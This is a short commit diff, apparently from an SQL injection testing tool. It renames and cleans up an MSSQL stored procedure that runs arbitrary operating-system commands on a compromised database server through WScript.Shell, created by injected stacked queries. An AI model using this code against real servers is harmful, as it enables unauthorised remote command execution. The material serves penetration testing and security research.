Minor update to cleanup properly new xp_cmdshell

2024-11-22 01:26:42 +03:00 · 2014-12-05 22:01:59 +01:00 · 2014-12-05 22:01:59 +01:00 · bd99470a4a
commit bd99470a4a
parent d726050bc4
3 changed files with 4 additions and 5 deletions
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -52,10 +52,9 @@ class Xp_cmdshell:
            inject.goStacked(agent.runAsDBMSUser(cmd))

        self._randStr = randomStr(lowercase=True)
-        self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
+        self.xpCmdshellStr = "master..new_xp_cmdshell"

-        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
+        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)

        if Backend.isVersionWithin(("2005", "2008")):
            cmd += ";RECONFIGURE WITH OVERRIDE"
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@ -162,7 +162,7 @@ class Miscellaneous:
            inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)

            if Backend.isDbms(DBMS.MSSQL):
-                return
+                udfDict = {"master..new_xp_cmdshell": None}

            if udfDict is None:
                udfDict = self.sysUdfs
--- a/procs/mssqlserver/create_new_xp_cmdshell.sql
+++ b/procs/mssqlserver/create_new_xp_cmdshell.sql
@ -1,3 +1,3 @@
 DECLARE @%RANDSTR% nvarchar(999);
-set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
+set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
 EXEC master..sp_executesql @%RANDSTR%